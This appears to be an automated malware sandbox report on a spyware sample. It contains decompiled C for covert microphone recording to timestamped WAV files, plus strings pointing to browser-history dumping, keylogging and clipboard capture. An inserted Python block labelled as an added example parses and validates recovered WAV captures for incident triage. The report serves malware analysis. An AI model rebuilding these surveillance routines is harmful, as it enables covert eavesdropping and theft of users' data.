                                          • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                          • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                          • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                          • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                          • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                        • String ID:
                                        • API String ID: 3909728815-0
                                        • Opcode ID: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                        • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                        • Opcode Fuzzy Hash: 304b19fcc533cbdc73590744d06a2ca5d32eb884cf4499deb611cf95ec401a1b
                                        • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 20%
                                        			// waveInProc callback as decompiled: _a8 is the uMsg argument and
                                        			// 0x3c0 is MM_WIM_DATA, delivered when a capture buffer has been filled.
                                        			// *0x41b210 is the HWAVEIN handle; 0x41b1a0 is the 0x20-byte WAVEHDR
                                        			// (lpData at 0x41b1a0, dwBufferLength at 0x41b1a4).
                                        			E00401640(void* __edx, intOrPtr _a8, char _a11) {
                                        				char _v5;
                                        				char _v12;
                                        				void* _v28;
                                        				char _v44;
                                        				char _v60;
                                        				char _v76;
                                        				char _v92;
                                        				char _v108;
                                        				char _v188;
                                        				int _t23;
                                        				char* _t25;
                                        				char* _t32;
                                        				char* _t33;
                                        				char* _t34;
                                        				CHAR* _t36;
                                        				intOrPtr _t37;
                                        				void* _t56;
                                        
                                        				_t23 =  &_v5;
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
                                        				if(_a8 == 0x3c0) {
                                        					// Output name: <prefix string at 0x41b1e8> + '\\' (0x5c) + strftime("%Y-%m-%d %H.%M") + ".wav"
                                        					__imp__time( &_v12, _t56);
                                        					_t25 =  &_v12;
                                        					__imp__localtime(_t25);
                                        					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
                                        					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
                                        					_t32 =  &_v76;
                                        					L00414152();
                                        					_t33 =  &_v108;
                                        					L0041414C();
                                        					_t34 =  &_v60;
                                        					L00414146();
                                        					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        					// Flush the filled WAVEHDR to disk as a PCM WAV file (see E004013BE)
                                        					E004013BE(_t34, 0x41b1a0);
                                        					// Unprepare, reset and re-queue the same header so capture continues
                                        					_t36 = waveInUnprepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					0x41b1a0->lpData = _t36;   // lpData
                                        					_t37 =  *0x41b1d8; // 0x0
                                        					 *0x41b1a4 = _t37;   // dwBufferLength, reloaded from 0x41b1d8
                                        					 *0x41b1a8 = 0;      // dwBytesRecorded
                                        					 *0x41b1ac = 0;      // dwUser
                                        					 *0x41b1b0 = 0;      // dwFlags
                                        					 *0x41b1b4 = 0;      // dwLoops
                                        					waveInPrepareHeader( *0x41b210, 0x41b1a0, 0x20);
                                        					_t23 = waveInAddBuffer( *0x41b210, 0x41b1a0, 0x20);
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t23;
                                        			}

                                        Disassembly listing (instruction text not captured in extraction; addresses 0x00401649 to 0x0040179c)

                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                        • time.MSVCRT ref: 00401668
                                        • localtime.MSVCRT ref: 00401672
                                        • strftime.MSVCRT ref: 00401687
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,0041B1E8,0000005C,00000000,.wav), ref: 004016C4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,.wav), ref: 004016D1
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00000000,.wav), ref: 004016DE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000,.wav), ref: 004016EA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016F3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 004016FC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401705
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 0040170E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000,.wav), ref: 00401717
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B1A0,?,?,?,?,?,?,?,00000000,.wav), ref: 00401726
                                          • Part of subcall function 004013BE: CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                        • waveInUnprepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040173D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,00000000,.wav), ref: 00401748
                                        • waveInPrepareHeader.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040177C
                                        • waveInAddBuffer.WINMM(0041B1A0,00000020,?,?,?,?,?,?,00000000,.wav), ref: 0040178B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000,.wav), ref: 00401795
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@2@@std@@D@std@@$??0?$basic_string@$G@2@@0@Hstd@@V?$basic_string@wave$?begin@?$basic_string@?c_str@?$basic_string@G@1@@HeaderV01@@V10@$??4?$basic_string@?end@?$basic_string@?length@?$basic_string@BufferCreateD@1@@FilePrepareUnprepareV01@V10@0@localtimestrftimetime
                                        • String ID: %Y-%m-%d %H.%M$.wav
                                        • API String ID: 4079669728-3597965672
                                        • Opcode ID: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                        • Instruction ID: bf0964d1dea1fddfd3b2107398812174aa57f11fbff5416b66007043dfe7270a
                                        • Opcode Fuzzy Hash: 65b9f5944380e4cbf397f0c8d18f8494b2e2b8de5bcf2efd9865c90dbcd23412
                                        • Instruction Fuzzy Hash: C641F87180060DEFDB00EBA0EC5DADE7B79EB48345F448036F505E71A0EB746689CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			// Writes a 44-byte PCM WAV header followed by the captured samples.
                                        			// _a4 is the output path on entry and is then reused as the
                                        			// lpNumberOfBytesWritten out-parameter of every WriteFile call.
                                        			// _a8 is the WAVEHDR passed by E00401640: *_a8 = lpData, _a8[1] = dwBufferLength.
                                        			// 0x41b21a, 0x41b21c and 0x41b226 sit at the nChannels, nSamplesPerSec and
                                        			// wBitsPerSample offsets of a WAVEFORMATEX at 0x41b218 (inferred from the
                                        			// field layout; the decompiler does not name the structure).
                                        			E004013BE(long _a4, void** _a8) {
                                        				void _v8;    // RIFF chunk size = data length + 0x24
                                        				void _v12;   // fmt chunk size = 0x10
                                        				void _v16;   // wFormatTag = 1 (WAVE_FORMAT_PCM)
                                        				void _v20;   // nAvgBytesPerSec
                                        				void _v24;   // nBlockAlign
                                        				void _v28;   // data chunk size
                                        				signed int _t37;
                                        				signed int _t41;
                                        				void* _t82;
                                        				signed int _t83;
                                        				signed int _t89;
                                        
                                        				_t83 =  *0x41b21a & 0x0000ffff;                        // nChannels
                                        				_t37 = ( *0x41b226 & 0x0000ffff) * _t83;                // wBitsPerSample * nChannels
                                        				_v20 = _t37 *  *0x41b21c >> 3;                          // bytes per second
                                        				asm("cdq");
                                        				_t89 = 8;
                                        				_v16 = 1;
                                        				_v12 = 0x10;
                                        				_v24 = _t37 / _t89;                                     // bytes per sample frame
                                        				_t41 = _a8[1] * _t83;                                   // declared data size: dwBufferLength * nChannels
                                        				_v28 = _t41;                                            // (only dwBufferLength bytes are written below)
                                        				_v8 = _t41 + 0x24;
                                        				_t82 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0);  // GENERIC_WRITE, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
                                        				if(_t82 != 0xffffffff) {
                                        					WriteFile(_t82, "RIFF", 4,  &_a4, 0);
                                        					WriteFile(_t82,  &_v8, 4,  &_a4, 0);
                                        					WriteFile(_t82, "WAVE", 4,  &_a4, 0);
                                        					WriteFile(_t82, "fmt ", 4,  &_a4, 0);
                                        					WriteFile(_t82,  &_v12, 4,  &_a4, 0);
                                        					WriteFile(_t82,  &_v16, 2,  &_a4, 0);
                                        					WriteFile(_t82, 0x41b21a, 2,  &_a4, 0);                // nChannels
                                        					WriteFile(_t82, 0x41b21c, 4,  &_a4, 0);                // nSamplesPerSec
                                        					WriteFile(_t82,  &_v20, 4,  &_a4, 0);
                                        					WriteFile(_t82,  &_v24, 2,  &_a4, 0);
                                        					WriteFile(_t82, 0x41b226, 2,  &_a4, 0);                // wBitsPerSample
                                        					WriteFile(_t82, "data", 4,  &_a4, 0);
                                        					WriteFile(_t82,  &_v28, 4,  &_a4, 0);
                                        					WriteFile(_t82,  *_a8, _a8[1],  &_a4, 0);              // raw PCM samples
                                        					CloseHandle(_t82);
                                        					return 1;
                                        				}
                                        				return 0;
                                        			}
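The following is an added example, not code from this report or from the sample, covering the two functions above: it rebuilds the 44-byte header in the same field order and with the same byte-rate and block-align arithmetic as E004013BE, parses and sanity-checks a .wav the way a responder would when triaging recordings recovered from an infected host, and checks file names against the strftime("%Y-%m-%d %H.%M") + ".wav" layout built in E00401640. The path prefix the sample prepends to the file name is not visible here and is not assumed; the sample audio is constructed.

```python
"""Added example (not from the report or the sample): WAV header builder and
validator matching the layout written by E004013BE, plus the capture file
name check derived from E00401640."""
import re
import struct

# E00401640 names each capture strftime("%Y-%m-%d %H.%M") + ".wav"
CAPTURE_NAME_RE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}\.\d{2}\.wav$")
HEADER_LEN = 44  # RIFF(12) + fmt chunk(24) + data chunk header(8)


def is_capture_name(name: str) -> bool:
    """True if a file name matches the timestamp layout used for captures."""
    return CAPTURE_NAME_RE.match(name) is not None


def build_wav(pcm: bytes, channels: int, sample_rate: int, bits: int) -> bytes:
    """Emit the header fields in the order E004013BE writes them, then pcm.

    Byte rate and block align use the decompiled arithmetic
    ((bits*channels*rate) >> 3 and bits*channels / 8).  The declared data
    length is len(pcm); the decompiled writer declares dwBufferLength *
    nChannels while writing dwBufferLength bytes, which only agrees for mono.
    """
    frame_bits = bits * channels
    byte_rate = (frame_bits * sample_rate) >> 3
    block_align = frame_bits // 8
    out = b"RIFF" + struct.pack("<I", len(pcm) + 0x24) + b"WAVE"
    out += b"fmt " + struct.pack("<IHHIIHH", 0x10, 1, channels, sample_rate,
                                 byte_rate, block_align, bits)
    out += b"data" + struct.pack("<I", len(pcm))
    return out + pcm


def parse_wav(blob: bytes) -> dict:
    """Parse the fixed-layout PCM header and list inconsistencies.

    An empty "problems" list means chunk ids, sizes and fmt fields agree with
    each other and with the actual payload length.
    """
    if len(blob) < HEADER_LEN:
        raise ValueError("too short for a RIFF/WAVE header")
    riff, riff_size, wave, fmt_id, fmt_size = struct.unpack_from("<4sI4s4sI", blob, 0)
    tag, channels, rate, byte_rate, block_align, bits = struct.unpack_from("<HHIIHH", blob, 20)
    data_id, data_size = struct.unpack_from("<4sI", blob, 36)
    problems = []
    if (riff, wave, fmt_id, data_id) != (b"RIFF", b"WAVE", b"fmt ", b"data"):
        problems.append("chunk ids")
    if fmt_size != 0x10 or tag != 1:
        problems.append("not a 16-byte PCM fmt chunk")
    if block_align != (bits * channels) // 8:
        problems.append("block align")
    if byte_rate != rate * block_align:
        problems.append("byte rate")
    if riff_size != data_size + 0x24:
        problems.append("riff size")
    if data_size != len(blob) - HEADER_LEN:
        problems.append("data size vs payload")
    return {"channels": channels, "sample_rate": rate, "bits": bits,
            "byte_rate": byte_rate, "block_align": block_align,
            "data_size": data_size, "problems": problems}


def stereo_header_as_decompiled(pcm: bytes, sample_rate: int, bits: int) -> bytes:
    """Constructed stereo case: declare 2*len(pcm) bytes as E004013BE would."""
    good = build_wav(pcm, 2, sample_rate, bits)
    declared = 2 * len(pcm)
    return (good[:4] + struct.pack("<I", declared + 0x24) + good[8:40]
            + struct.pack("<I", declared) + pcm)


if __name__ == "__main__":
    # constructed input: 16 frames of 16-bit mono silence at 8 kHz
    sample = build_wav(b"\x00\x00" * 16, 1, 8000, 16)
    print(is_capture_name("2021-04-20 13.05.wav"), parse_wav(sample))
    print(parse_wav(stereo_header_as_decompiled(b"\x00\x00\x00\x00" * 8, 8000, 16))["problems"])
```

A recovered capture whose header passes every check except "data size vs payload" is what the decompiled writer produces for a non-mono WAVEFORMATEX; the audio is still playable by truncating the declared sizes to the actual payload.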

                                        Disassembly listing (instruction text not captured in extraction; addresses 0x004013c4 to 0x00401512)

                                        APIs
                                        • CreateFileW.KERNEL32(00401732,40000000,00000000,00000000,00000002,00000080,00000000,?,0041B1A0), ref: 00401424
                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,00000010,00000000,?,0041B1A0), ref: 0040144B
                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000010,00000000,?,0041B1A0), ref: 00401459
                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000010,00000000,?,0041B1A0), ref: 00401468
                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000010,00000000,?,0041B1A0), ref: 00401477
                                        • WriteFile.KERNEL32(00000000,00000010,00000004,00000010,00000000,?,0041B1A0), ref: 00401485
                                        • WriteFile.KERNEL32(00000000,00000001,00000002,00000010,00000000,?,0041B1A0), ref: 00401493
                                        • WriteFile.KERNEL32(00000000,0041B21A,00000002,00000010,00000000,?,0041B1A0), ref: 004014A2
                                        • WriteFile.KERNEL32(00000000,0041B21C,00000004,00000010,00000000,?,0041B1A0), ref: 004014B1
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014BF
                                        • WriteFile.KERNEL32(00000000,?,00000002,00000010,00000000,?,0041B1A0), ref: 004014CD
                                        • WriteFile.KERNEL32(00000000,0041B226,00000002,00000010,00000000,?,0041B1A0), ref: 004014DC
                                        • WriteFile.KERNEL32(00000000,data,00000004,00000010,00000000,?,0041B1A0), ref: 004014EB
                                        • WriteFile.KERNEL32(00000000,?,00000004,00000010,00000000,?,0041B1A0), ref: 004014F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$Write$Create
                                        • String ID: RIFF$WAVE$data$fmt
                                        • API String ID: 1602526932-4212202414
                                        • Opcode ID: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                        • Instruction ID: 91b5b913efd348db76e64cf746c5e08b94ff9205a7cc9a5ceb03776573d28bcb
                                        • Opcode Fuzzy Hash: a99678cb21b7d93cbe87bee30868a2d6c3fec46b9c3e62da9134e588c1076753
                                        • Instruction Fuzzy Hash: 6F411CB654021CBAD7109BA1DC89FEB7FBCEBC5B10F008416BA06EA181D674D744CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                          • Part of subcall function 004124BE: time.MSVCRT ref: 004124E5
                                          • Part of subcall function 004124BE: srand.MSVCRT ref: 004124F2
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 00412506
                                          • Part of subcall function 004124BE: rand.MSVCRT ref: 0041251A
                                          • Part of subcall function 004124BE: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                          • Part of subcall function 004124BE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                          • Part of subcall function 004124BE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • Sleep.KERNEL32(000000FA), ref: 00401C24
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401C52
                                        Strings
                                        • /sort "Visit Time" /stext ", xrefs: 00401B97
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$D@2@@std@@D@std@@$??1?$basic_string@G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@$D@1@@G@2@@0@Hstd@@V?$basic_string@$FileV01@@rand$CreateG@1@@ModuleNameSleepV01@V10@V10@0@V10@@Y?$basic_string@srandtime
                                        • String ID: /sort "Visit Time" /stext "
                                        • API String ID: 1247708949-1573945896
                                        • Opcode ID: c9265e89abb72ce271c0bd17de8721e1b2a5c4203b50f58a46765617997ca894
                                        • Instruction ID: 821258ceffa38abf0b50ebb2211f36aec7c07e94205cba95cd2ca02b6bdb4f84
                                        • Opcode Fuzzy Hash: c9265e89abb72ce271c0bd17de8721e1b2a5c4203b50f58a46765617997ca894
                                        • Instruction Fuzzy Hash: B131127290050DEBCB04EBE0ED4D9DE777CEB58345F104036F902E7090EA759A49CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B9C,?,00000000,?,745E73F0,?), ref: 0040697B
                                        • toupper.MSVCRT ref: 0040698A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [Ctrl + ,?,00000000), ref: 0040699E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004069A9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069C5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004069CE
                                        • toupper.MSVCRT ref: 00406A61
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004069B3
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                          • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                          • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 004069D7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?, [Ctrl + V][Following text has been pasted from clipboard:],00000000,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A01
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,[End of clipboard text],00000000,?,745E73F0,?), ref: 00406A0B
